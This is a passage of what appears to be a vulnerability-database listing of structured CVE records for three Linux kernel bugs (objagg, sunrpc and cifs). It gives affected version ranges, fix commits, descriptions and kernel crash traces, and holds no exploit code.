"lessThan": "499f742fed42e74f1321f4b12ca196a66a2b49fc",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "b4a3a89fffcdf09702b1f161b914e52abca1894d",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"lib/objagg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib: objagg: Fix general protection fault\n\nThe library supports aggregation of objects into other objects only if\nthe parent object does not have a parent itself. That is, nesting is not\nsupported.\n\nAggregation happens in two cases: Without and with hints, where hints\nare a pre-computed recommendation on how to aggregate the provided\nobjects.\n\nNesting is not possible in the first case due to a check that prevents\nit, but in the second case there is no check because the assumption is\nthat nesting cannot happen when creating objects based on hints. The\nviolation of this assumption leads to various warnings and eventually to\na general protection fault [1].\n\nBefore fixing the root cause, error out when nesting happens and warn.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdead000000000d90: 0000 [#1] PREEMPT SMP PTI\nCPU: 1 PID: 1083 Comm: kworker/1:9 Tainted: G W 6.9.0-rc6-custom-gd9b4f1cca7fb #7\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:mlxsw_sp_acl_erp_bf_insert+0x25/0x80\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_entry_add+0x256/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270\n mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:35.155Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8161263362154cbebfbf4808097b956a6a8cb98a"
},
{
"url": "https://git.kernel.org/stable/c/22ae17a267f4812861f0c644186c3421ff97dbfc"
},
{
"url": "https://git.kernel.org/stable/c/565213e005557eb6cc4e42189d26eb300e02f170"
},
{
"url": "https://git.kernel.org/stable/c/5adc61d29bbb461d7f7c2b48dceaa90ecd182eb7"
},
{
"url": "https://git.kernel.org/stable/c/1936fa05a180834c3b52e0439a6bddc07814d3eb"
},
{
"url": "https://git.kernel.org/stable/c/499f742fed42e74f1321f4b12ca196a66a2b49fc"
},
{
"url": "https://git.kernel.org/stable/c/b4a3a89fffcdf09702b1f161b914e52abca1894d"
}
],
"title": "lib: objagg: Fix general protection fault",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43846",
"datePublished": "2024-08-17T09:22:00.481Z",
"dateReserved": "2024-08-17T09:11:59.275Z",
"dateUpdated": "2025-05-04T09:27:35.155Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42246 (GCVE-0-2024-42246)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net, sunrpc: Remap EPERM in case of connection failure in xs_tcp_setup_socket
When using a BPF program on kernel_connect(), the call can return -EPERM. This
causes xs_tcp_setup_socket() to loop forever, filling up the syslog and causing
the kernel to potentially freeze up.
Neil suggested:
This will propagate -EPERM up into other layers which might not be ready
to handle it. It might be safer to map EPERM to an error we would be more
likely to expect from the network system - such as ECONNREFUSED or ENETDOWN.
ECONNREFUSED as error seems reasonable. For programs setting a different error
can be out of reach (see handling in 4fbac77d2d09) in particular on kernels
which do not have f10d05966196 ("bpf: Make BPF_PROG_RUN_ARRAY return -err
instead of allow boolean"), thus given that it is better to simply remap for
consistent behavior. UDP does handle EPERM in xs_udp_send_request().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 Version: 4fbac77d2d092b475dda9eea66da674369665427 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42246",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:31.910049Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.112Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtsock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bc790261218952635f846aaf90bcc0974f6f62c6",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "934247ea65bc5eca8bdb7f8c0ddc15cef992a5d6",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "02ee1976edb21a96ce8e3fd4ef563f14cc16d041",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "5d8254e012996cee1a0f9cc920531cb7e4d9a011",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "f2431e7db0fe0daccb2f06bb0d23740affcd2fa6",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "d6c686c01c5f12ff8f7264e0ddf71df6cb0d4414",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "f388cfd913a2b96c05339a335f365795db1b36b6",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
},
{
"lessThan": "626dfed5fa3bfb41e0dffd796032b555b69f9cde",
"status": "affected",
"version": "4fbac77d2d092b475dda9eea66da674369665427",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtsock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.322",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.284",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.226",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.167",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.322",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.284",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.226",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.167",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet, sunrpc: Remap EPERM in case of connection failure in xs_tcp_setup_socket\n\nWhen using a BPF program on kernel_connect(), the call can return -EPERM. This\ncauses xs_tcp_setup_socket() to loop forever, filling up the syslog and causing\nthe kernel to potentially freeze up.\n\nNeil suggested:\n\n This will propagate -EPERM up into other layers which might not be ready\n to handle it. It might be safer to map EPERM to an error we would be more\n likely to expect from the network system - such as ECONNREFUSED or ENETDOWN.\n\nECONNREFUSED as error seems reasonable. For programs setting a different error\ncan be out of reach (see handling in 4fbac77d2d09) in particular on kernels\nwhich do not have f10d05966196 (\"bpf: Make BPF_PROG_RUN_ARRAY return -err\ninstead of allow boolean\"), thus given that it is better to simply remap for\nconsistent behavior. UDP does handle EPERM in xs_udp_send_request()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:59.980Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bc790261218952635f846aaf90bcc0974f6f62c6"
},
{
"url": "https://git.kernel.org/stable/c/934247ea65bc5eca8bdb7f8c0ddc15cef992a5d6"
},
{
"url": "https://git.kernel.org/stable/c/02ee1976edb21a96ce8e3fd4ef563f14cc16d041"
},
{
"url": "https://git.kernel.org/stable/c/5d8254e012996cee1a0f9cc920531cb7e4d9a011"
},
{
"url": "https://git.kernel.org/stable/c/f2431e7db0fe0daccb2f06bb0d23740affcd2fa6"
},
{
"url": "https://git.kernel.org/stable/c/d6c686c01c5f12ff8f7264e0ddf71df6cb0d4414"
},
{
"url": "https://git.kernel.org/stable/c/f388cfd913a2b96c05339a335f365795db1b36b6"
},
{
"url": "https://git.kernel.org/stable/c/626dfed5fa3bfb41e0dffd796032b555b69f9cde"
}
],
"title": "net, sunrpc: Remap EPERM in case of connection failure in xs_tcp_setup_socket",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42246",
"datePublished": "2024-08-07T15:14:31.615Z",
"dateReserved": "2024-07-30T07:40:12.254Z",
"dateUpdated": "2025-05-04T09:24:59.980Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48919 (GCVE-0-2022-48919)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cifs: fix double free race when mount fails in cifs_get_root()
When cifs_get_root() fails during cifs_smb3_do_mount() we call
deactivate_locked_super() which eventually will call delayed_free() which
will free the context.
In this situation we should not proceed to enter the out: section in
cifs_smb3_do_mount() and free the same resources a second time.
[Thu Feb 10 12:59:06 2022] BUG: KASAN: use-after-free in rcu_cblist_dequeue+0x32/0x60
[Thu Feb 10 12:59:06 2022] Read of size 8 at addr ffff888364f4d110 by task swapper/1/0
[Thu Feb 10 12:59:06 2022] CPU: 1 PID: 0 Comm: swapper/1 Tainted: G OE 5.17.0-rc3+ #4
[Thu Feb 10 12:59:06 2022] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.0 12/17/2019
[Thu Feb 10 12:59:06 2022] Call Trace:
[Thu Feb 10 12:59:06 2022] <IRQ>
[Thu Feb 10 12:59:06 2022] dump_stack_lvl+0x5d/0x78
[Thu Feb 10 12:59:06 2022] print_address_description.constprop.0+0x24/0x150
[Thu Feb 10 12:59:06 2022] ? rcu_cblist_dequeue+0x32/0x60
[Thu Feb 10 12:59:06 2022] kasan_report.cold+0x7d/0x117
[Thu Feb 10 12:59:06 2022] ? rcu_cblist_dequeue+0x32/0x60
[Thu Feb 10 12:59:06 2022] __asan_load8+0x86/0xa0
[Thu Feb 10 12:59:06 2022] rcu_cblist_dequeue+0x32/0x60
[Thu Feb 10 12:59:06 2022] rcu_core+0x547/0xca0
[Thu Feb 10 12:59:06 2022] ? call_rcu+0x3c0/0x3c0
[Thu Feb 10 12:59:06 2022] ? __this_cpu_preempt_check+0x13/0x20
[Thu Feb 10 12:59:06 2022] ? lock_is_held_type+0xea/0x140
[Thu Feb 10 12:59:06 2022] rcu_core_si+0xe/0x10
[Thu Feb 10 12:59:06 2022] __do_softirq+0x1d4/0x67b
[Thu Feb 10 12:59:06 2022] __irq_exit_rcu+0x100/0x150
[Thu Feb 10 12:59:06 2022] irq_exit_rcu+0xe/0x30
[Thu Feb 10 12:59:06 2022] sysvec_hyperv_stimer0+0x9d/0xc0
...
[Thu Feb 10 12:59:07 2022] Freed by task 58179:
[Thu Feb 10 12:59:07 2022] kasan_save_stack+0x26/0x50
[Thu Feb 10 12:59:07 2022] kasan_set_track+0x25/0x30
[Thu Feb 10 12:59:07 2022] kasan_set_free_info+0x24/0x40
[Thu Feb 10 12:59:07 2022] ____kasan_slab_free+0x137/0x170
[Thu Feb 10 12:59:07 2022] __kasan_slab_free+0x12/0x20
[Thu Feb 10 12:59:07 2022] slab_free_freelist_hook+0xb3/0x1d0
[Thu Feb 10 12:59:07 2022] kfree+0xcd/0x520
[Thu Feb 10 12:59:07 2022] cifs_smb3_do_mount+0x149/0xbe0 [cifs]
[Thu Feb 10 12:59:07 2022] smb3_get_tree+0x1a0/0x2e0 [cifs]
[Thu Feb 10 12:59:07 2022] vfs_get_tree+0x52/0x140
[Thu Feb 10 12:59:07 2022] path_mount+0x635/0x10c0
[Thu Feb 10 12:59:07 2022] __x64_sys_mount+0x1bf/0x210
[Thu Feb 10 12:59:07 2022] do_syscall_64+0x5c/0xc0
[Thu Feb 10 12:59:07 2022] entry_SYSCALL_64_after_hwframe+0x44/0xae
[Thu Feb 10 12:59:07 2022] Last potentially related work creation:
[Thu Feb 10 12:59:07 2022] kasan_save_stack+0x26/0x50
[Thu Feb 10 12:59:07 2022] __kasan_record_aux_stack+0xb6/0xc0
[Thu Feb 10 12:59:07 2022] kasan_record_aux_stack_noalloc+0xb/0x10
[Thu Feb 10 12:59:07 2022] call_rcu+0x76/0x3c0
[Thu Feb 10 12:59:07 2022] cifs_umount+0xce/0xe0 [cifs]
[Thu Feb 10 12:59:07 2022] cifs_kill_sb+0xc8/0xe0 [cifs]
[Thu Feb 10 12:59:07 2022] deactivate_locked_super+0x5d/0xd0
[Thu Feb 10 12:59:07 2022] cifs_smb3_do_mount+0xab9/0xbe0 [cifs]
[Thu Feb 10 12:59:07 2022] smb3_get_tree+0x1a0/0x2e0 [cifs]
[Thu Feb 10 12:59:07 2022] vfs_get_tree+0x52/0x140
[Thu Feb 10 12:59:07 2022] path_mount+0x635/0x10c0
[Thu Feb 10 12:59:07 2022] __x64_sys_mount+0x1bf/0x210
[Thu Feb 10 12:59:07 2022] do_syscall_64+0x5c/0xc0
[Thu Feb 10 12:59:07 2022] entry_SYSCALL_64_after_hwframe+0x44/0xae
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48919",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:34.933209Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.259Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/cifs/cifsfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "da834d6c1147c7519a9e55b510a03b7055104749",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "147a0e71ccf96df9fc8c2ac500829d8e423ef02c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2fe0e281f7ad0a62259649764228227dd6b2561d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e208668ef7ba23efcbf76a8200cab8deee501c4d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "df9db1a2af37f39ad1653c7b9b0d275d72d0bc67",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "546d60859ecf13380fcabcbeace53a5971493a2b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "563431c1f3c8f2230e4a9c445fa23758742bc4f0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3d6cc9898efdfb062efb74dc18cfc700e082f5d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/cifs/cifsfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.305",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.233",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.183",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.305",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.233",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.183",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix double free race when mount fails in cifs_get_root()\n\nWhen cifs_get_root() fails during cifs_smb3_do_mount() we call\ndeactivate_locked_super() which eventually will call delayed_free() which\nwill free the context.\nIn this situation we should not proceed to enter the out: section in\ncifs_smb3_do_mount() and free the same resources a second time.\n\n[Thu Feb 10 12:59:06 2022] BUG: KASAN: use-after-free in rcu_cblist_dequeue+0x32/0x60\n[Thu Feb 10 12:59:06 2022] Read of size 8 at addr ffff888364f4d110 by task swapper/1/0\n\n[Thu Feb 10 12:59:06 2022] CPU: 1 PID: 0 Comm: swapper/1 Tainted: G OE 5.17.0-rc3+ #4\n[Thu Feb 10 12:59:06 2022] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.0 12/17/2019\n[Thu Feb 10 12:59:06 2022] Call Trace:\n[Thu Feb 10 12:59:06 2022] \u003cIRQ\u003e\n[Thu Feb 10 12:59:06 2022] dump_stack_lvl+0x5d/0x78\n[Thu Feb 10 12:59:06 2022] print_address_description.constprop.0+0x24/0x150\n[Thu Feb 10 12:59:06 2022] ? rcu_cblist_dequeue+0x32/0x60\n[Thu Feb 10 12:59:06 2022] kasan_report.cold+0x7d/0x117\n[Thu Feb 10 12:59:06 2022] ? rcu_cblist_dequeue+0x32/0x60\n[Thu Feb 10 12:59:06 2022] __asan_load8+0x86/0xa0\n[Thu Feb 10 12:59:06 2022] rcu_cblist_dequeue+0x32/0x60\n[Thu Feb 10 12:59:06 2022] rcu_core+0x547/0xca0\n[Thu Feb 10 12:59:06 2022] ? call_rcu+0x3c0/0x3c0\n[Thu Feb 10 12:59:06 2022] ? __this_cpu_preempt_check+0x13/0x20\n[Thu Feb 10 12:59:06 2022] ? lock_is_held_type+0xea/0x140\n[Thu Feb 10 12:59:06 2022] rcu_core_si+0xe/0x10\n[Thu Feb 10 12:59:06 2022] __do_softirq+0x1d4/0x67b\n[Thu Feb 10 12:59:06 2022] __irq_exit_rcu+0x100/0x150\n[Thu Feb 10 12:59:06 2022] irq_exit_rcu+0xe/0x30\n[Thu Feb 10 12:59:06 2022] sysvec_hyperv_stimer0+0x9d/0xc0\n...\n[Thu Feb 10 12:59:07 2022] Freed by task 58179:\n[Thu Feb 10 12:59:07 2022] kasan_save_stack+0x26/0x50\n[Thu Feb 10 12:59:07 2022] kasan_set_track+0x25/0x30\n[Thu Feb 10 12:59:07 2022] kasan_set_free_info+0x24/0x40\n[Thu Feb 10 12:59:07 2022] ____kasan_slab_free+0x137/0x170\n[Thu Feb 10 12:59:07 2022] __kasan_slab_free+0x12/0x20\n[Thu Feb 10 12:59:07 2022] slab_free_freelist_hook+0xb3/0x1d0\n[Thu Feb 10 12:59:07 2022] kfree+0xcd/0x520\n[Thu Feb 10 12:59:07 2022] cifs_smb3_do_mount+0x149/0xbe0 [cifs]\n[Thu Feb 10 12:59:07 2022] smb3_get_tree+0x1a0/0x2e0 [cifs]\n[Thu Feb 10 12:59:07 2022] vfs_get_tree+0x52/0x140\n[Thu Feb 10 12:59:07 2022] path_mount+0x635/0x10c0\n[Thu Feb 10 12:59:07 2022] __x64_sys_mount+0x1bf/0x210\n[Thu Feb 10 12:59:07 2022] do_syscall_64+0x5c/0xc0\n[Thu Feb 10 12:59:07 2022] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\n[Thu Feb 10 12:59:07 2022] Last potentially related work creation:\n[Thu Feb 10 12:59:07 2022] kasan_save_stack+0x26/0x50\n[Thu Feb 10 12:59:07 2022] __kasan_record_aux_stack+0xb6/0xc0\n[Thu Feb 10 12:59:07 2022] kasan_record_aux_stack_noalloc+0xb/0x10\n[Thu Feb 10 12:59:07 2022] call_rcu+0x76/0x3c0\n[Thu Feb 10 12:59:07 2022] cifs_umount+0xce/0xe0 [cifs]\n[Thu Feb 10 12:59:07 2022] cifs_kill_sb+0xc8/0xe0 [cifs]\n[Thu Feb 10 12:59:07 2022] deactivate_locked_super+0x5d/0xd0\n[Thu Feb 10 12:59:07 2022] cifs_smb3_do_mount+0xab9/0xbe0 [cifs]\n[Thu Feb 10 12:59:07 2022] smb3_get_tree+0x1a0/0x2e0 [cifs]\n[Thu Feb 10 12:59:07 2022] vfs_get_tree+0x52/0x140\n[Thu Feb 10 12:59:07 2022] path_mount+0x635/0x10c0\n[Thu Feb 10 12:59:07 2022] __x64_sys_mount+0x1bf/0x210\n[Thu Feb 10 12:59:07 2022] do_syscall_64+0x5c/0xc0\n[Thu Feb 10 12:59:07 2022] entry_SYSCALL_64_after_hwframe+0x44/0xae"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:06.308Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/da834d6c1147c7519a9e55b510a03b7055104749"
},
{
